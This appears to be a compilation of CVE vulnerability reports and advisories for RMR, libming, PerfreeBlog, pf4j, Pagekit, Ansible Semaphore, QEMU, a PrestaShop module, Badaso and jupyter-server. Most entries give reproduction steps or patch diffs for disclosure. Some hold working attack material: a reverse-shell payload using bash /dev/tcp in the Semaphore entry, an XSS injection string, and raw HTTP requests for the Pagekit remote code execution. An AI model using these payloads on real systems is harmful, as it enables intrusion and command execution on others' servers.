Buffer Overflow vulnerability in O-RAN Software Community ric-plt-lib-rmr v.4.9.0 allows a remote attacker to cause a denial of service via the packet size component.

Hello,

I would like to report an issue related to the packet size in the rmr library (ric-plt-lib-rmr).

When processing received packets, the library decodes the first 4 bytes as the packet size.

However, if the decoding result is a negative value, it leads to a subsequent core dump during the memcpy operation.

Through xApp, we can send packets of this nature to services that utilize this RMR library, leading to the disruption of the services.

This problem can be found in components that utilize the RMR library. For example, in the e2term, when receiving a packet with a decoded negative packet size on port 4561, it triggers this crash.

I have attached images of the packets that led to the crash and the decoded packets.

CVE-2023-40998: [RIC-989] RMR: Negative Packet Size Causes Crash

Buffer Overflow vulnerability in Libming Libming v.0.4.8 allows a remote attacker to cause a denial of service via a crafted .swf file to the makeswf function.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

A heap buffer overflow occurs when makeswf parse a invalid swf file, and the filename extension is .swf.

**Test Environment**

Ubuntu 20.04, 64 bit  
libming (master 04aee52)

**Steps to reproduce**

1.  compile libming with ASAN

    $ CC="clang -fsanitize=address,fuzzer-no-link -g" CFLAGS+=" -fcommon" ./configure 
    $ make
    

2.  Download the poc file from here and run cmd  
    $ makeswf $POC

**ASAN report**

    $ ./bin_asan/bin/makeswf ./poc-makeswf-04aee52-r_readc-HBO.swf
    Output file name: out.swf
    Output compression level: 9
    Output SWF version: 6
    =================================================================
    ==5625==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60800000013f at pc 0x0000004f15b5 bp 0x7fff376560d0 sp 0x7fff376560c8
    WRITE of size 1 at 0x60800000013f thread T0
        #0 0x4f15b4 in r_readc /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:264:34
        #1 0x4f1a37 in getbits /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:143:18
        #2 0x4f1656 in rect /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:169:9
        #3 0x4efe15 in openswf /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:303:2
        #4 0x4eedbe in newSWFPrebuiltClip_fromInput /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:1302:8
        #5 0x4cbea3 in embed_swf /opt/disk/marsman/libming/04aee52/build_asan/util/makeswf.c:699:14
        #6 0x4ca4d9 in main /opt/disk/marsman/libming/04aee52/build_asan/util/makeswf.c:401:4
        #7 0x7f0aa6b3d83f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291
        #8 0x41c5a8 in _start (/opt/disk/marsman/libming/04aee52/bin_asan/bin/makeswf+0x41c5a8)
    
    0x60800000013f is located 199 bytes to the right of 88-byte region [0x608000000020,0x608000000078)
    allocated by thread T0 here:
        #0 0x4975fd in malloc /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3
        #1 0x4ef8d8 in openswf /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:271:41
        #2 0x4eedbe in newSWFPrebuiltClip_fromInput /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:1302:8
        #3 0x4cbea3 in embed_swf /opt/disk/marsman/libming/04aee52/build_asan/util/makeswf.c:699:14
        #4 0x4ca4d9 in main /opt/disk/marsman/libming/04aee52/build_asan/util/makeswf.c:401:4
        #5 0x7f0aa6b3d83f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /opt/disk/marsman/libming/04aee52/build_asan/src/blocks/fromswf.c:264:34 in r_readc
    Shadow bytes around the buggy address:
      0x0c107fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c107fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
      0x0c107fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c107fff8020: fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa
      0x0c107fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c107fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==5625==ABORTING
    

1 participant

CVE-2023-40781: heap-buffer-overflow in r_readc() at fromswf.c:264 · Issue #288 · libming/libming

An issue in Perfree PerfreeBlog v.3.1.2 allows a remote attacker to execute arbitrary code via crafted plugin listed in admin/plugin/access/list.

**Vulnerability information**

PerfreeBlog implements the extension plug-in function based on SpringBoot and pf4j. After the plug-in is developed, it is packaged as a jar package, which can be directly installed and used online through the plug-in management of PerfreeBlog background. If an attacker develops a plug-in and inserts malicious code, uploading the malicious plug-in after the malicious code is parsed can trigger command execution.

**affected version**

<= v3.1.2

**vulnerability analysis**

1.  Download the latest PerfreeBlog running package and decompress it.  
    After the directory is decompressed, run start.bat  
    

2, Access the Web service, initialize the database and administrator account.  

3.  Make a plug-in with malicious code.  
    Plug-in development refer to: https://perfree.gitee.io/plugin-develop/create.html.  
    The malicious code is as follows: the calculator pops up when admin/plugin/access/list is accessed.  
    
4.  Upload the plug-in and run.  
    

5.  access the admin/plugin/access/list interface and execute the malicious code successfully.

CVE-2023-40825: The uploaded malicious plug-in is parsed and the command is executed · Issue #15 · perfree/PerfreeBlog

An issue in pf4j pf4j v.3.9.0 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the zippluginPath parameter.

**description**

Dear project developers, I use SpringBoot and pf4j to implement the system's extension plug-in function, the use of zip or jar package format is very easy to expand the system. When I was using pf4j, I found that the pluginPath value was not verified securely when loading plug-ins. If the developers using pf4j were not security conscious, directly calling the loadPluginFromPath method to receive malicious parameters passed by untrusted users would lead to directory traversal vulnerabilities.

**affected version**

<= release-3.9.0

**vulnerability analysis**

The sample code attempts to extract a malicious file (for example: C:\\Windows\\notepad.exe) to the root path of drive E to simulate a directory traversal attack.

1.  Build a malicious ZIP file，Save the resulting ZIP file to E:\\Code\\0811\\malicious.zip。  
    

2, write a test class, call DefaultPluginManager#loadPluginFromPath method to load E:\\Code\\0811\\malicious.zip  

First run a test class to prove that the path E:\\Windows\\notepad.exe does not exist.  

3.  Debug the code  
    Go to DefaultPluginManager#loadPluginFromPath.  
    Load the plug-in from disk. If the path is a zip file, unzip it first.  
    

Do some preparatory work in FileUtils  

Follow up unzip.extract()  

After the execution is complete, extract the target file to the root directory of drive E.

CVE-2023-40826: The method of extracting the zip file has a path traversal vulnerability · Issue #536 · pf4j/pf4j

An issue in Pagekit pagekit v.1.0.18 alows a remote attacker to execute arbitrary code via thedownloadAction and updateAction functions in UpdateController.php

**Problem**

**There is a logical flaw that leads to obtaining shell access.**

**Technical Details**

*   Pagekit version: 1.0.18
*   Webserver: nginx
*   Database: mysql
*   PHP Version: 7.4

Vulnerability Path:  
app/installer/src/Controller/UpdateController.php  
Lines 32-72: downloadAction and updateAction functions  
The downloadAction function retrieves a file from a remote location to the local system.  
The updateAction function reads the downloaded file.  
Within it, the SelfUpdater function is called at app/installer/src/SelfUpdater.php.  
It includes the app/installer/requirements.php file from the remotely fetched file.  
This can lead to remote code execution.  
Based on this, constructing a zip file as follows:  
pagekit.zip

The data package is as follows

    POST /index.php/admin/system/update/download HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: keep-alive
    Content-Length: 58
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost/index.php/admin/system/update/download
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    url=constructed_zip_file&_csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2
    

    POST /index.php/admin/system/update/update HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cache-Control: max-age=0
    Connection: keep-alive
    Content-Length: 46
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost /index.php/admin/system/update/update
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    _csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2

CVE-2023-41005: There is a logical flaw that leads to obtaining shell access. · Issue #977 · pagekit/pagekit

An issue in ansible semaphore v.2.8.90 allows a remote attacker to execute arbitrary code via a crafted payload to the extra variables parameter.

\---------------------------------------------------------------

\[VulnerabilityType Other\]

Remote Command Execution (RCE)

\---------------------------------------------------------------

\[Affected Component\]

Ansible Semaphore includes a feature called "Extra Variables." This feature can be accessed at https://<semaphore-endpoint>/project/id/environment and is directly associated with the ansible-playbook --extra-vars flag.

\---------------------------------------------------------------

\[Attack Type\]

Remote

\---------------------------------------------------------------

\[Impact Code execution\]

true

\---------------------------------------------------------------

\[Impact Denial of Service\]

true

\---------------------------------------------------------------

\[Impact Escalation of Privileges\]

true

\---------------------------------------------------------------

\[Impact Information Disclosure\]

true

\---------------------------------------------------------------

\[Attack Vectors\]

The --extra-vars parameter can be abused by a malicious user with low privileges to achieve Remote Command Execution (RCE) and read files and configurations, perform Server Side Request Forgery (SSRF), execute commands, and establish a reverse shell on the ansible server. Payload:

{"ansible\_user": "{{ lookup('ansible.builtin.pipe', \\"bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1337 <&1'\\") }}"}

\---------------------------------------------------------------

\[Has vendor confirmed\]

true

\---------------------------------------------------------------

\[Discoverer\]

@alevsk

\---------------------------------------------------------------

\[Reference\]

https://www.alevsk.com/2023/07/a-quick-story-of-security-pitfalls-with-execcommand-in-software-integrations/

\---------------------------------------------------------------

\[Vendor of Product\]

ansible semaphore

\---------------------------------------------------------------

\[Affected Product Code Base\]

ansible semaphore v2.8.90

\---------------------------------------------------------------

CVE-2023-39059: CVE-2023-39059

An issue was discovered in TCG Accelerator in QEMU 4.2.0, allows local attackers to execute arbitrary code, escalate privileges, and cause a denial of service (DoS).

I believe I found a UAF in TCG that can lead to a guest VM escape. The security list informed me "This can not be treated as a security issue." and to post it here. I am looking at the 4.2.0 source code. The issue requires a race and I will try to describe it in terms of three concurrent threads.

Thread A:

A1. qemu\_tcg\_cpu\_thread\_fn runs work loop  
A2. qemu\_wait\_io\_event => qemu\_wait\_io\_event\_common => process\_queued\_cpu\_work  
A3. start\_exclusive critical section entered  
A4. do\_tb\_flush is called, TB memory freed/re-allocated  
A5. end\_exclusive exits critical section

Thread B:

B1. qemu\_tcg\_cpu\_thread\_fn runs work loop  
B2. tcg\_cpu\_exec => cpu\_exec => tb\_find => tb\_gen\_code  
B3. tcg\_tb\_alloc obtains a new TB

Thread C:

C1. qemu\_tcg\_cpu\_thread\_fn runs work loop  
C2. cpu\_exec\_step\_atomic executes  
C3. TB obtained with tb\_lookup\_\_cpu\_state or tb\_gen\_code  
C4. start\_exclusive critical section entered  
C5. cpu\_tb\_exec executes the TB code  
C6. end\_exclusive exits critical section

Consider the following sequence of events:  
  B2 => B3 => C3 (same TB as B2) => A3 => A4 (TB freed) => A5 => B2 =>  
  B3 (re-allocates TB from B2) => C4 => C5 (freed/reused TB now executing) => C6

In short, because thread C uses the TB in the critical section, there is no guarantee that the pointer has not been "freed" (rather the memory is marked as re-usable) and therefore a use-after-free occurs.

Since the TCG generated code can be in the same memory as the TB data structure, it is possible for an attacker to overwrite the UAF pointer with code generated from TCG. This can overwrite key pointer values and could lead to code execution on the host outside of the TCG sandbox.

CVE-2020-24165: Bug #1863025 “Use-after-free after flush in TCG accelerator” : Bugs : QEMU

theme volty tvcmsvideotab up to v4.0.0 was discovered to contain a SQL injection vulnerability via the component TvcmsVideoTabConfirmDeleteModuleFrontController::run().

In the module “Theme Volty Video Tab” (tvcmsvideotab) up to version 4.0.0 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-39652
*   **Published at**: 2023-08-24
*   **Platform**: PrestaShop
*   **Product**: tvcmsvideotab
*   **Impacted release**: <= 4.0.0 (4.0.1 fixed the vulnerability)
*   **Product author**: Theme Volty
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The methods TvcmsVideoTabConfirmDeleteModuleFrontController::run() and TvcmsVideoTabSaveVideoModuleFrontController::run() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

This exploit uses a PrestaShop front controller and most attackers can conceal the module controller’s path during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 4.0.0**

    --- 4.0.0/tvcmsvideotab/controllers/front/confirmdelete.php
    +++ 4.0.1/tvcmsvideotab/controllers/front/confirmdelete.php
    class TvcmsVideoTabConfirmDeleteModuleFrontController extends ModuleFrontController
    {
        /**
         * @see FrontController::postProcess()
         */
        public function run()
        {
            $db = Db::getInstance(_PS_USE_SQL_SLAVE_);
        -   $id_product = Tools::getValue('id');
        +   $id_product = (int) Tools::getValue('id');
        -   $id_lang = Tools::getValue('id_lang');
        +   $id_lang = (int) Tools::getValue('id_lang');
            $id_shop = $this->context->shop->id;
        }
    }
    

    --- 4.0.0/tvcmsvideotab/controllers/front/savevideo.php
    +++ XXXXX/tvcmsvideotab/controllers/front/savevideo.php
    class TvcmsVideoTabSaveVideoModuleFrontController extends ModuleFrontController
    {
        public function run()
        {
            $ok = '';
            $id_lang_default = Configuration::get('PS_LANG_DEFAULT');
            $ob_lang_default = new Language($id_lang_default);
            $name_lang_default = $ob_lang_default->name;
    -       $id_shop = Tools::getValue('id_shop');
    +       $id_shop = (int) Tools::getValue('id_shop');
    -       $name_shop = Tools::getValue('name_shop');
    +       $name_shop = pSQL(Tools::getValue('name_shop'));
            $db = Db::getInstance(_PS_USE_SQL_SLAVE_);
            $url = $_SERVER['SCRIPT_FILENAME'];
            $url = rtrim($url, 'index.php');
            $languages = Language::getLanguages();
    -       $type_video = Tools::getValue('type_video');
    +       $type_video = pSQL(Tools::getValue('type_video'));
    -       $id_product = Tools::getValue('id_product');
    +       $id_product = (int) Tools::getValue('id_product');
    ...
                            $sql = 'REPLACE INTO ' . _DB_PREFIX_ . 'url_video ';
                            $sql .= '(id_video,id_product,id_store,text_url,language,shop,name_product,type,id_lang)';
                            $sql .= " VALUES ('" . $id_video . "','" . $id_product . "','" . $id_shop . "','";
    -                       $sql .= '' . trim($name_url_array[$value_lang['id_lang']]) . "','" . $value_lang['name'] . "','";
    +                       $sql .= '' . pSQL(trim($name_url_array[$value_lang['id_lang']])) . "','" . $value_lang['name'] . "','";
    ...
                            $sql = 'REPLACE INTO ' . _DB_PREFIX_ . 'url_video ';
                            $sql .= '(id_video,id_product,id_store,text_url,language,shop,name_product,type,id_lang)';
                            $sql .= " VALUES ('" . $id_video . "','" . $id_product . "','" . $id_shop . "','";
    -                       $sql .= '' . trim($name_url_array[$value_lang['id_lang']]) . "','" . $value_lang['name'] . "','";
    +                       $sql .= '' . pSQL(trim($name_url_array[$value_lang['id_lang']])) . "','" . $value_lang['name'] . "','";
    ...
                            $sql = 'REPLACE INTO ' . _DB_PREFIX_ . 'url_video ';
                            $sql .= '(id_video,id_product,id_store,text_url,language,shop,name_product,type,id_lang)';
                            $sql .= " VALUES ('" . $id_video . "','" . $id_product . "','" . $id_shop . "','";
    -                       $sql .= '' . trim($name_url_array[$value_lang['id_lang']]) . "','" . $value_lang['name'] . "','";
    +                       $sql .= '' . pSQL(trim($name_url_array[$value_lang['id_lang']])) . "','" . $value_lang['name'] . "','";
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **tvcmsvideotab**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-02-10

Issue discovered during a code review by TouchWeb.fr

2023-02-10

Contact PrestaShop Addons security Team to confirm versions scope by author

2023-02-15

Author provide a patch which still own all criticals vulnerabilities

2023-04-13

Recontact PrestaShop Addons security Team to confirm versions scope by author

2023-04-13

Request a CVE ID

2023-05-19

Author provide patch

2023-08-15

Received CVE ID

2023-08-24

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   Author product page
*   National Vulnerability Database

CVE-2023-39652: [CVE-2023-39652] Improper neutralization of SQL parameter in Theme Volty Video Tab module for PrestaShop

Cross Site Scripting vulnerabiltiy in Badaso v.2.9.7 allows a remote attacker to execute arbitrary code via a crafted payload to the title parameter in the new book and edit book function.

****Vendor Homepage:****

**Badaso - Open Collective**

****Version:****

2.9.7

****Tested On:****

Marcos, review source code

****Affected Page:****

https://badaso-demo.uatech.co.id/dashboard/general/borrowing/add

https://badaso-demo.uatech.co.id/dashboard/general/borrowing/1/edit

****Description:****

A vulnerability XSS injection was found in Badaso v2.9.7. Cross-site scripting (XSS) is a type of security vulnerability that occurs when a web application includes untrusted data in its output to a web browser. This can allow malicious scripts to be executed by a user's browser, potentially compromising their data and interactions with the website. XSS attacks can have various impacts, including stealing sensitive information, session hijacking, defacement of websites, and more

****Proof of Concept:****

1.  **Login and Access to function add Books.**
    
2.  **Inject payload XSS alert 1 to the Title of book parameter and submit it.**
    
          "' test <img src="" onerror="alert(5)">
        
    
3.  Go to Borrowing and add a new Borrowing or edit Borrowing then malicious is executed.

CVE-2023-38969: Badaso version 2.9.7 has an XSS vulnerability in add books

jupyter-server is the backend for Jupyter web applications. Open Redirect Vulnerability. Maliciously crafted login links to known Jupyter Servers can cause successful login or an already logged-in session to be redirected to arbitrary sites, which should be restricted to Jupyter Server-served URLs. This issue has been addressed in commit `29036259` which is included in release 2.7.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Expand Up

@@ -41,12 +41,25 @@ def \_redirect\_safe(self, url, default=None):

\# \\ is not valid in urls, but some browsers treat it as /

\# instead of %5C, causing \`\\\\\` to behave as \`//\`

url \= url.replace("\\\\", "%5C")

\# urllib and browsers interpret extra '/' in the scheme separator (\`scheme:///host/path\`)

\# differently.

\# urllib gives scheme=scheme, netloc='', path='/host/path', while

\# browsers get scheme=scheme, netloc='host', path='/path'

\# so make sure ':///\*' collapses to '://' by splitting and stripping any additional leading slash

\# don't allow any kind of \`:/\` shenanigans by splitting on ':' only

\# and replacing \`:/\*\` with exactly \`://\`

if ":" in url:

scheme, \_, rest \= url.partition(":")

url \= f"{scheme}://{rest.lstrip('/')}"

parsed \= urlparse(url)

if parsed.netloc or not (parsed.path + "/").startswith(self.base\_url):

\# full url may be \`//host/path\` (empty scheme == same scheme as request)

\# or \`https://host/path\`

\# or even \`https:///host/path\` (invalid, but accepted and ambiguously interpreted)

if (parsed.scheme or parsed.netloc) or not (parsed.path + "/").startswith(self.base\_url):

\# require that next\_url be absolute path within our path

allow \= False

\# OR pass our cross-origin check

if parsed.netloc:

if parsed.scheme or parsed.netloc:

\# if full URL, run our cross-origin check:

origin \= f"{parsed.scheme}://{parsed.netloc}"

origin \= origin.lower()

Expand Down

Source

CVE